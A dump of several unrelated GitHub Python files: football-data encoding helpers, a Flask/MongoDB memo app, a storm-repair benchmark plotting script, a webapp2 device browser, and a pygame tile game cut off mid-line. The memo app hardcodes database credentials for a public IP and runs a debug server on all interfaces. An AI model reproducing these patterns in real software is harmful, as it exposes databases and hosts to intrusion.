(('Gegner_Trainer_ID') in var) or (('HeimSystem') in var):\n \n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2) \n X_train_array = encode_test_training_set(X_train, X_test, var)\n y_train_array = y_train.values.ravel()\n\n else:\n \n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2) \n X_train_array, y_train_array = X_train.values, y_train.values.ravel()\n \n return X_train_array, y_train_array, X_train \n\n\ndef encode_variable(df, variable):\n \n data = df[variable]\n df = df.drop([variable], axis = 1)\n values = array(data)\n label_encoder = LabelEncoder()\n integer_encoded = label_encoder.fit_transform(values)\n \n onehot_encoder = OneHotEncoder(sparse=False)\n integer_encoded = integer_encoded.reshape(len(integer_encoded), 1)\n onehot_encoded = onehot_encoder.fit_transform(integer_encoded)\n \n return df, onehot_encoded\n\ndef encode_variable_train_and_test(df_train, df_test, variable):\n \n data_train = df_train[variable]\n data_test = df_test[variable]\n \n df_train = df_train.drop([variable], axis = 1)\n df_test = df_test.drop([variable], axis = 1)\n \n values_train = array(data_train)\n values_test = array(data_test) \n \n label_encoder = LabelEncoder()\n \n integer_encoded_train = label_encoder.fit_transform(values_train)\n integer_encoded_test = label_encoder.transform(values_test)\n \n onehot_encoder = OneHotEncoder(sparse=False)\n integer_encoded_train = integer_encoded_train.reshape(len(integer_encoded_train), 1)\n integer_encoded_test = integer_encoded_test.reshape(len(integer_encoded_test), 1)\n \n \n onehot_encoded_train = onehot_encoder.fit_transform(integer_encoded_train)\n onehot_encoded_test = onehot_encoder.transform(integer_encoded_test)\n \n return df_train, df_test, onehot_encoded_train, onehot_encoded_test\n\n\ndef encode_test_training_set(df_train, df_test, variables):\n \n if 'Verein_Trainer_ID' in variables:\n \n if 'Verein_Trainer_ID' in variables:\n df_train, teams_encoded_train = encode_variable(df_train, 'Verein_Trainer_ID')\n df_train, away_teams_encoded_train = encode_variable(df_train, 'Away_Verein_Trainer_ID')\n \n teams_encoded_train = np.concatenate((teams_encoded_train, away_teams_encoded_train), axis=1)\n \n if 'HeimSystem' in variables:\n df_train, home_system_encoded_train = encode_variable(df_train, 'HeimSystem')\n df_train, away_system_encoded_train = encode_variable(df_train, 'AuswärtsSystem')\n \n system_encoded_train = np.concatenate((home_system_encoded_train, away_system_encoded_train), axis=1)\n\n \n \n if (('Verein_Trainer' in variables) and ('HeimSystem' in variables)):\n \n all_encoded_variables_train = np.concatenate((teams_encoded_train, system_encoded_train), axis=1)\n \n \n if (('Verein_Trainer' in variables) and ('HeimSystem' not in variables)):\n \n all_encoded_variables_train = teams_encoded_train\n \n \n if (('Verein_Trainer' not in variables) and ('HeimSystem' in variables)):\n \n all_encoded_variables_train = system_encoded_train\n \n \n else:\n \n if 'Heimmannschaft_ID' in variables:\n \n df_train, home_teams_encoded_train = encode_variable(df_train, 'Heimmannschaft_ID')\n df_train, away_teams_encoded_train = encode_variable(df_train, 'Gegner_ID')\n teams_encoded_train = np.concatenate((home_teams_encoded_train, away_teams_encoded_train), axis=1)\n \n \n if 'Trainer_ID' in variables:\n \n df_train, home_trainer_encoded_train = encode_variable(df_train, 'Trainer_ID')\n df_train, away_trainer_encoded_train = encode_variable(df_train, 'Gegner_Trainer_ID')\n trainer_encoded_train = np.concatenate((home_trainer_encoded_train, away_trainer_encoded_train), axis=1)\n \n \n if 'HeimSystem' in variables:\n \n df_train, home_system_encoded_train = encode_variable(df_train, 'HeimSystem')\n df_train, away_system_encoded_train = encode_variable(df_train, 'AuswärtsSystem')\n system_encoded_train = np.concatenate((home_system_encoded_train, away_system_encoded_train), axis=1)\n \n \n if (('Heimmannschaft_ID' in variables) and ('Trainer_ID' in variables) and ('HeimSystem' in variables)):\n \n all_encoded_variables_train = np.concatenate((teams_encoded_train, trainer_encoded_train, system_encoded_train), axis=1)\n \n \n if (('Heimmannschaft_ID' in variables) and ('HeimSystem' in variables) and ('Trainer_ID' not in variables)):\n \n all_encoded_variables_train = np.concatenate((teams_encoded_train, system_encoded_train), axis=1)\n \n \n if (('Heimmannschaft_ID' in variables) and ('Trainer_ID' in variables) and ('HeimSystem' not in variables)):\n \n all_encoded_variables_train = np.concatenate((teams_encoded_train, trainer_encoded_train), axis=1)\n \n \n if (('Heimmannschaft_ID' not in variables) and ('Trainer_ID' in variables) and ('HeimSystem' in variables)):\n \n all_encoded_variables_train = np.concatenate((system_encoded_train, trainer_encoded_train), axis=1)\n \n \n if (('Heimmannschaft_ID' in variables) and ('Trainer_ID' not in variables) and ('HeimSystem' not in variables)):\n \n all_encoded_variables_train = teams_encoded_train\n \n \n if (('Heimmannschaft_ID' not in variables) and ('Trainer_ID' in variables) and ('HeimSystem' not in variables)):\n \n all_encoded_variables_train = trainer_encoded_train\n \n \n if (('Heimmannschaft_ID' not in variables) and ('Trainer_ID' not in variables) and ('HeimSystem' in variables)):\n \n all_encoded_variables_train = system_encoded_train\n \n\n \n x_variables = df_train.values\n x_variables = np.concatenate((x_variables, all_encoded_variables_train), axis=1)\n \n \n return x_variables", "repo_name": "TobiasLiedtke/project_football", "sub_path": "PROD/Test/Tools.py", "file_name": "Tools.py", "file_ext": "py", "file_size_in_byte": 7870, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pandas.read_excel", "line_number": 2, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 18, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 27, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 33, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 39, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 40, "usage_type": "call"}, {"api_name": "Read_Load_Database.get_test_query", "line_number": 46, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 60, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 76, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 77, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.OneHotEncoder", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 95, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 97, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.OneHotEncoder", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 206, "usage_type": "call"}]} +{"seq_id": "7076468287", "text": "from flask import Flask, render_template, jsonify, request\n\napp = Flask(__name__)\nfrom pymongo import MongoClient\n\nclient = MongoClient('mongodb://test:test@13.124.220.19', 27017)\ndb = client.dbjungle\n\n## HTML을 주는 부분\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n\n@app.route('/memo', methods=['GET'])\ndef listing():\n # 1. 모든 document 찾기 & _id 값은 출력에서 제외하기\n result = list(db.posts.find({}, {'_id': 0}))\n # 2. posts라는 키 값으로 영화정보 내려주기\n return jsonify({'result': 'success', 'posts': result})\n\n\n## API 역할을 하는 부분\n@app.route('/memo', methods=['POST'])\ndef saving():\n # 1. 클라이언트로부터 데이터를 받기\n url_receive = request.form['url_give']\n comment_receive = request.form['comment_give']\n # global cardID\n cardID=1\n cardID = cardID+1\n\n article = {'url': url_receive, 'comment': comment_receive, 'cardID': cardID}\n # 3. mongoDB에 데이터 넣기\n db.posts.insert_one(article)\n return jsonify({'result': 'success', 'msg': 'POST 연결되었습니다!'})\n\n## API 역할을 하는 부분\n@app.route('/delete', methods=['POST'])\ndef deleting():\n # 1. 클라이언트로부터 데이터를 받기\n # id_receive = request.form['cardId']\n title_receive = request.form['cardTitle']\n content_receive = request.form['cardContent']\n\n db.posts.delete_one({'url': title_receive, 'comment' : content_receive})\n return jsonify({'result': 'success', 'msg': '삭제 성공했습니다!'})\n\n## API 역할을 하는 부분\n@app.route('/update', methods=['POST'])\ndef updating():\n # 1. 클라이언트로부터 데이터를 받기\n # id_receive = request.form['cardId']\n btitle_receive = request.form['beforeCardTitle']\n bcontent_receive = request.form['beforeCardContent']\n atitle_receive = request.form['afterCardTitle']\n acontent_receive = request.form['afterCardContent']\n print(\"btitle_receive : \"+btitle_receive)\n print(\"atitle_receive : \"+atitle_receive)\n print(\"acontent_receive : \"+acontent_receive)\n\n filter1 = {'url': btitle_receive}\n filter2 = {'url': atitle_receive}\n\n # Values to be updated.\n newvalue1 = {\"$set\": {'url': atitle_receive}}\n newvalue2 = {\"$set\": {'comment': acontent_receive}}\n\n # Using update_one() method for single\n # updation.\n db.posts.update_one(filter1, newvalue1)\n db.posts.update_one(filter2, newvalue2)\n return jsonify({'result': 'success', 'msg': '수정 성공했습니다!'})\n\nif __name__ == '__main__':\n app.run('0.0.0.0', port=5000, debug=True)\n", "repo_name": "jojorealpine/jungle-js", "sub_path": "alonememo2/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2604, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "flask.Flask", "line_number": 3, "usage_type": "call"}, {"api_name": "pymongo.MongoClient", "line_number": 6, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 20, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 27, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 27, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 28, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 28, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 36, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 43, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 43, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 44, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 44, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 47, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 54, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 54, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 55, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 55, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 56, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 57, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 57, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 73, "usage_type": "call"}]} +{"seq_id": "5188182526", "text": "\"\"\"\nDriver code for mass benchmark\n\"\"\"\nimport json\nimport random\nfrom typing import Any, DefaultDict\n\nimport matplotlib.pyplot as plt # type: ignore\n\nimport benchmark\nfrom graph import Graph\n\n\nclass Bcolors:\n \"\"\"\n Helper class for adding colors to prints\n https://svn.blender.org/svnroot/bf-blender/trunk/blender/build_files/scons/tools/Bcolors.py\n \"\"\"\n\n HEADER = \"\\033[95m\"\n OKBLUE = \"\\033[94m\"\n OKCYAN = \"\\033[96m\"\n OKGREEN = \"\\033[92m\"\n WARNING = \"\\033[93m\"\n FAIL = \"\\033[91m\"\n ENDC = \"\\033[0m\"\n BOLD = \"\\033[1m\"\n UNDERLINE = \"\\033[4m\"\n CLEAR_LAST_LINE = (\n \"\\033[A \\033[A\"\n )\n\n\ndef main() -> None:\n ############################################################################\n ########################### Mass Benchmarking ##############################\n ############################################################################\n\n # Parameters for Graphs and Partitions\n num_graphs: int = 100\n num_nodes: int = 201 # 20 agents * 10 nodes per agent + start\n metric = True\n upper: float = 1.0 # Travel time between 0.5-1 hour\n node_w: tuple[int, int] = (1, 1500)\n num_agents: int = 20\n\n print(\"Generating graphs\")\n graph_bank: list[Graph] = benchmark.generate_graph_bank(\n count=num_graphs, n=num_nodes, metric=metric, upper=upper, node_w=node_w\n )\n\n print(\"Seeing start location weight to 0\")\n for g in graph_bank:\n g.node_weight[0] = 0\n\n print(\"Adding repair times\")\n for g in graph_bank:\n # Ranges from \"Predicting Outage Restoration ...\"\n for v in range(num_nodes):\n pop: int = g.node_weight[v]\n if pop <= 10:\n repair_time: float = random.uniform(2, 4)\n elif pop <= 100:\n repair_time = random.uniform(2, 6)\n elif pop <= 1000:\n repair_time = random.uniform(3, 8)\n else:\n repair_time = random.uniform(5, 10)\n for u in range(num_nodes):\n if u != v:\n g.edge_weight[u][v] += repair_time\n\n print(\"Generating initial partitions\")\n partition_bank: list[list[set[int]]] = benchmark.generate_agent_partitions(\n graph_bank, num_agents\n )\n\n # Mass benchmark of graphs given bank\n # Need to edit the ranges\n # If metric: do (upper / 2, upper)\n benchmark_results: list[DefaultDict[Any, Any]] = benchmark.mass_benchmark(\n graph_bank, partition_bank, (0.5, 1.0)\n )\n\n # Write to files\n names: list[str] = [\n \"maximums\",\n \"wait_times\",\n \"times\",\n \"minimums\",\n \"sums\",\n \"ranges\",\n \"averages\",\n \"bests\",\n ]\n for res, name in zip(benchmark_results, names):\n with open(\n f\"results/mass_benchmark/{name}.json\", \"w\", encoding=\"utf-8\"\n ) as outfile:\n json.dump(res, outfile)\n\n # Box Plot for sum of weighted latencies\n with open(\"results/mass_benchmark/sums.json\", encoding=\"utf-8\") as file:\n sums: dict[str, list[float]] = json.load(file)\n\n results: list[str] = [\n \"Greedy Assignment\",\n \"Nearest Neighbor Assignment\",\n \"Greedy + Random (25%) Assignment\",\n \"Transfers and Swaps Greedy\",\n \"Transfers and Swaps Nearest Neighbor\",\n ]\n\n boxes: list[list[float]] = [sums[name] for name in results]\n colors: list[str] = [\"royalblue\", \"aqua\", \"blue\", \"limegreen\", \"darkgreen\"]\n\n fig, ax = plt.subplots(figsize=(6, 6))\n\n bp = ax.boxplot(boxes, patch_artist=True)\n for patch, color in zip(bp[\"boxes\"], colors):\n patch.set_facecolor(color)\n for median in bp[\"medians\"]:\n median.set(color=\"black\", linewidth=3)\n\n frame1 = plt.gca()\n frame1.axes.xaxis.set_ticklabels([\"GA\", \"NNA\", \"GRA\", \"TSG\", \"TSNN\"])\n ax.tick_params(axis=\"both\", which=\"major\", labelsize=20)\n ax.tick_params(axis=\"both\", which=\"minor\", labelsize=20)\n plt.suptitle(\"Sum of Weighted Latencies\", fontsize=20)\n plt.gcf().axes[0].yaxis.get_major_formatter().set_scientific(False)\n fig.savefig(\"results/mass_benchmark/total_work\", bbox_inches=\"tight\")\n\n # Bar Plot for average wait times\n with open(\"results/mass_benchmark/wait_times.json\", encoding=\"utf-8\") as file:\n wait: dict[str, list[float]] = json.load(file)\n\n boxes = [wait[name] for name in results]\n colors = [\"royalblue\", \"aqua\", \"blue\", \"limegreen\", \"darkgreen\"]\n\n fig, ax = plt.subplots(figsize=(6, 6))\n\n bp = ax.boxplot(boxes, patch_artist=True)\n for patch, color in zip(bp[\"boxes\"], colors):\n patch.set_facecolor(color)\n for median in bp[\"medians\"]:\n median.set(color=\"black\", linewidth=3)\n\n frame1 = plt.gca()\n frame1.axes.xaxis.set_ticklabels([\"GA\", \"NNA\", \"GRA\", \"TSG\", \"TSNN\"])\n ax.tick_params(axis=\"both\", which=\"major\", labelsize=20)\n ax.tick_params(axis=\"both\", which=\"minor\", labelsize=20)\n plt.suptitle(\"Average Wait Time (Hours)\", fontsize=20)\n plt.gcf().axes[0].yaxis.get_major_formatter().set_scientific(False)\n fig.savefig(\"results/mass_benchmark/wait_time\", bbox_inches=\"tight\")\n\n # Bar Plot for ranges\n with open(\"results/mass_benchmark/ranges.json\", encoding=\"utf-8\") as file:\n ranges: dict[str, list[float]] = json.load(file)\n\n boxes = [ranges[name] for name in results]\n colors = [\"royalblue\", \"aqua\", \"blue\", \"limegreen\", \"darkgreen\"]\n\n fig, ax = plt.subplots(figsize=(6, 6))\n\n bp = ax.boxplot(boxes, patch_artist=True)\n for patch, color in zip(bp[\"boxes\"], colors):\n patch.set_facecolor(color)\n for median in bp[\"medians\"]:\n median.set(color=\"black\", linewidth=3)\n\n frame1 = plt.gca()\n frame1.axes.xaxis.set_ticklabels([\"GA\", \"NNA\", \"GRA\", \"TSG\", \"TSNN\"])\n ax.tick_params(axis=\"both\", which=\"major\", labelsize=20)\n ax.tick_params(axis=\"both\", which=\"minor\", labelsize=20)\n plt.suptitle(\"Range of Weighted Latencies\", fontsize=20)\n plt.gcf().axes[0].yaxis.get_major_formatter().set_scientific(False)\n fig.savefig(\"results/mass_benchmark/ranges\", bbox_inches=\"tight\")\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "leadcatlab/MWLP-Storm-Repair", "sub_path": "mass_benchmark.py", "file_name": "mass_benchmark.py", "file_ext": "py", "file_size_in_byte": 6164, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "41", "api": [{"api_name": "graph.Graph", "line_number": 48, "usage_type": "name"}, {"api_name": "benchmark.generate_graph_bank", "line_number": 48, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 62, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 64, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 66, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 68, "usage_type": "call"}, {"api_name": "benchmark.generate_agent_partitions", "line_number": 74, "usage_type": "call"}, {"api_name": "typing.DefaultDict", "line_number": 81, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 81, "usage_type": "name"}, {"api_name": "benchmark.mass_benchmark", "line_number": 81, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 100, "usage_type": "call"}, {"api_name": "json.load", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.suptitle", "line_number": 129, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 129, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 130, "usage_type": "name"}, {"api_name": "json.load", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 140, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 148, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.suptitle", "line_number": 152, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 152, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 153, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 153, "usage_type": "name"}, {"api_name": "json.load", "line_number": 158, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 163, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 171, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 171, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.suptitle", "line_number": 175, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 175, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 176, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 176, "usage_type": "name"}]} +{"seq_id": "6843533028", "text": "import webapp2\nfrom utils import *\nfrom device import DeviceInterface\nimport json\nimport sys\nfrom paste import httpserver\nfrom paste.urlparser import StaticURLParser\nfrom paste.cascade import Cascade\nfrom socket import error as SocketError\nimport os\nimport urllib\n\nSCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))\n_global_Device = DeviceInterface()\n_log = CLogger(__name__)\nTEST_PAGE = 'test'\n\nclass ElemsList(Handler):\n def get(self):\n _log.info('GET /elems?elem=%s'%self.request.get('elem'))\n if not _global_Device.loaded():\n return self.response.write('[]')\n elem = str(self.request.get('elem')).strip()\n if not elem:\n return self.response.write('[]')\n result = json.dumps(_global_Device.getLocs(elem))\n return self.response.write(result)\n\nclass NodePage(Handler):\n def get(self):\n _log.info('GET /show?gid=%s&elem=%s&x=%s&y=%s&z=%s&i=%s'%(self.request.get('gid'),\n self.request.get('elem'),\n self.request.get('x'),\n self.request.get('y'),\n self.request.get('z'),\n self.request.get('i')))\n if not _global_Device.loaded():\n _log.warning('New Node page requested but device not yet loaded!')\n return self.redirect('/')\n\n gid = str(self.request.get('gid')).strip()\n if gid and gid.isdigit():\n node = _global_Device.getNode(int(gid))\n return self.render('show.html',\n part=_global_Device.part(),\n node=node,\n num_fanins=len(node.fanins()),\n num_fanouts=len(node.fanouts()))\n\n elem = str(self.request.get('elem')).strip()\n x = str(self.request.get('x'))\n y = str(self.request.get('y'))\n z = str(self.request.get('z'))\n i = str(self.request.get('i'))\n\n if elem and x and x.isdigit() \\\n and y and y.isdigit() \\\n and z and z.isdigit() \\\n and i and i.isdigit():\n node = _global_Device.lookup(elem,\n int(x),\n int(y),\n int(z),\n int(i))\n if node:\n return self.render('show.html',\n part=_global_Device.part(),\n node=node,\n num_fanins=len(node.fanins()),\n num_fanouts=len(node.fanouts()))\n\n error = urllib.urlencode({'error' : 'Could not find that node!'})\n _log.warning('Could not find requested node')\n return self.redirect('/?' + error)\n\nclass MainPage(Handler):\n def renderDeviceLoader(self):\n pdevice_map = _global_Device.getDeviceMap()\n pdevice_map_str = json.dumps(pdevice_map)\n return self.render('device.html',\n device_map = pdevice_map,\n device_map_str = pdevice_map_str)\n\n def renderNewNode(self):\n error_header = self.request.get('error')\n return self.render('node.html',\n part=_global_Device.part(),\n error_header=error_header,\n elem_list = _global_Device.getElems())\n\n def get(self):\n _log.info('GET /')\n if not _global_Device.loaded():\n return self.renderDeviceLoader()\n else:\n return self.renderNewNode()\n\n def post(self):\n _log.info('POST /')\n part = str(self.request.get('part')).strip()\n if part:\n _log.info('Loading device %s'%part)\n _global_Device.load(part)\n _log.info('Finished loading device')\n return self.redirect('/')\n\nclass TestPage(Handler):\n def get(self):\n _log.info('GET /%s'%TEST_PAGE)\n return self.response.write('OK')\n\n\ndef main():\n host = sys.argv[1]\n port = sys.argv[2]\n global TEST_PAGE\n\n if len(sys.argv) > 3:\n TEST_PAGE = sys.argv[3]\n\n web_app = webapp2.WSGIApplication([\n ('/', MainPage),\n ('/show', NodePage),\n ('/%s'%TEST_PAGE, TestPage),\n ('/elems', ElemsList)\n ], debug=True)\n static_app = StaticURLParser((os.path.join(SCRIPT_DIR, \"static\")))\n\n # Create a cascade that looks for static files first, then tries the webapp\n app = Cascade([static_app, web_app])\n try:\n httpserver.serve(app, host=host, port=port)\n except SocketError:\n _log.critical('Failed to start webserver at http://%s:%s'%(host, port))\n exit(-1)\n\nif __name__ == '__main__':\n main()\n", "repo_name": "smukherj1/gusafir", "sub_path": "gusafir_server.py", "file_name": "gusafir_server.py", "file_ext": "py", "file_size_in_byte": 4422, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.path.dirname", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 13, "usage_type": "call"}, {"api_name": "device.DeviceInterface", "line_number": 14, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 26, "usage_type": "call"}, {"api_name": "urllib.urlencode", "line_number": 72, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 79, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 114, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 115, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 118, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 119, "usage_type": "attribute"}, {"api_name": "webapp2.WSGIApplication", "line_number": 121, "usage_type": "call"}, {"api_name": "paste.urlparser.StaticURLParser", "line_number": 127, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 127, "usage_type": "call"}, {"api_name": "os.path", "line_number": 127, "usage_type": "attribute"}, {"api_name": "paste.cascade.Cascade", "line_number": 130, "usage_type": "call"}, {"api_name": "paste.httpserver.serve", "line_number": 132, "usage_type": "call"}, {"api_name": "paste.httpserver", "line_number": 132, "usage_type": "name"}, {"api_name": "socket.error", "line_number": 133, "usage_type": "name"}]} +{"seq_id": "133446390", "text": "import pygame\nimport math\nimport csv\n\nWATER = 0\nDIRT = 1\nGRASS = 2\n\nGREEN = (0,255,0)\n\ndisplay_width = 800\ndisplay_height = 600\n\nx = display_width*.45\ny = display_height*.8\nplayerSize = 20\n\nall_sprites = pygame.sprite.Group()\nmap_sprites = pygame.sprite.Group()\n\ntileset = {0:pygame.image.load('water.png'), 1:pygame.image.load('dirt.png'), 2:pygame.image.load('grass.png')}\n\npygame.init()\n\nwith open('explore_map.csv', 'r') as f:\n reader = csv.reader(f)\n currentmap = list(reader)\n\n\nscreen = pygame.display.set_mode((display_width,display_height))\npygame.display.set_caption('explore!')\n\nclock = pygame.time.Clock()\ncrashed = False\n\nblack = (0,0,0)\ntileSize = 20\nwhite = (255,255,255)\nplayerImg = pygame.image.load('player.png')\n\ndef player(x,y):\n\tscreen.blit(playerImg, (x,y))\n\t\ndef drawTile(tile, x, y):\n\tscreen.blit(tileset[tile], (x,y))\n\ndef drawMap(map):\n\tfor row in range(0, len(map)):\n\t\tfor tileIn in range(0, len(map[0])):\n\t\t\ttile = map[row][tileIn]\n\t\t\tx = tileIn * tileSize\n\t\t\ty = row * tileSize\n\t\t\tdrawTile(int(tile), x, y)\n\ndef loadMap(map):\n\tfor row in range(0, len(map)):\n\t\tfor tileIn in range(0, len(map[0])):\n\t\t\ttile = map[row][tileIn]\n\t\t\tif int(tile) < 2:\n\t\t\t\tx = tileIn * tileSize\n\t\t\t\ty = row * tileSize\n\t\t\t\tmap_sprites.add(Tile(int(tile), x, y))\n\n\ndef getCurrentTile(x, y):\n\trow = math.floor(y/tileSize)\n\tcol = math.floor(x/tileSize)\n\treturn map[row][column]\n\nxspeed = 4\nyspeed = xspeed\ndspeed = xspeed*.75\n\nleftKey = pygame.K_a\nrightKey = pygame.K_d\nupKey = pygame.K_w\ndownKey = pygame.K_s\n\n\nkeysPressed = [0,0,0,0] #W, A, S, D (or up, left, down, right)\n\nclass Tile(pygame.sprite.DirtySprite):\n\tdef __init__(self, terrainID, x, y):\n\t\tpygame.sprite.DirtySprite.__init__(self)\n\t\tself.image = tileset[terrainID]\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.x = x\n\t\tself.rect.y = y\n\t\tself.dirty = 0\n\t\tself.defaultImage = self.image\n\nclass Player(pygame.sprite.DirtySprite):\n\tdef __init__(self):\n\t\tpygame.sprite.DirtySprite.__init__(self)\n\t\tself.image = pygame.image.load('player.png')\n\t\tself.rect = self.image.get_rect()\n\t\tself.vx = 0\n\t\tself.vy = 0\n\t\tself.lastC = Tile(0,0,0)\n\tdef update(self):\n\t\tself.vx = 0\n\t\tself.vy = 0\n\t\tif keysPressed[1] == 1:\n\t\t\tself.vx -= xspeed\n\t\tif keysPressed[3] == 1:\n\t\t\tself.vx += xspeed\n\t\tif keysPressed[0] == 1:\n\t\t\tself.vy -= yspeed\n\t\tif keysPressed[2] == 1:\n\t\t\tself.vy += yspeed\n\t\t\n\t\tif sum(keysPressed) == 2:\n\t\t\tif self.vx != 0 and self.vy != 0:\n\t\t\t\tif self.vx > 0:\n\t\t\t\t\tself.vx = dspeed\n\t\t\t\telse:\n\t\t\t\t\tself.vx = -dspeed\n\t\t\t\tif self.vy > 0:\n\t\t\t\t\tself.vy = dspeed\n\t\t\t\telse:\n\t\t\t\t\tself.vy = -dspeed\n\t\t\n\n\t\n\t\tself.rect.x += self.vx\n\t\tself.rect.y += self.vy\n\t\n\t\t#set back player if he has crossed a screen boundary\n\t\tif self.rect.x > display_width-playerSize:\n\t\t\tself.rect.x = display_width-playerSize\n\t\tif self.rect.x < 0:\n\t\t\tself.rect.x = 0\n\t\tif self.rect.y > display_height-playerSize:\n\t\t\tself.rect.y = display_height-playerSizewd\n\t\tif self.rect.y < 0:\n\t\t\tself.rect.y = 0\n\t\tself.dirty = 1\n\t\t\n\t\t# collision detection\n\t\tcollideSpriteList = pygame.sprite.spritecollide(self, map_sprites, False, collided = None)\n\t\tif(collideSpriteList): #if there was a collision\n\t\t\tcollideSprite = collideSpriteList[int(len(collideSpriteList)/2)]\n\t\t\tcollideX = collideSprite.rect.x\n\t\t\tcollideY = collideSprite.rect.y\n\t\t\tcollideSprite.image = tileset[2]\n\t\t\tcollisionBuffer = playerSize\n\t\t\tif self.rect.x in range(collideX-collisionBuffer, 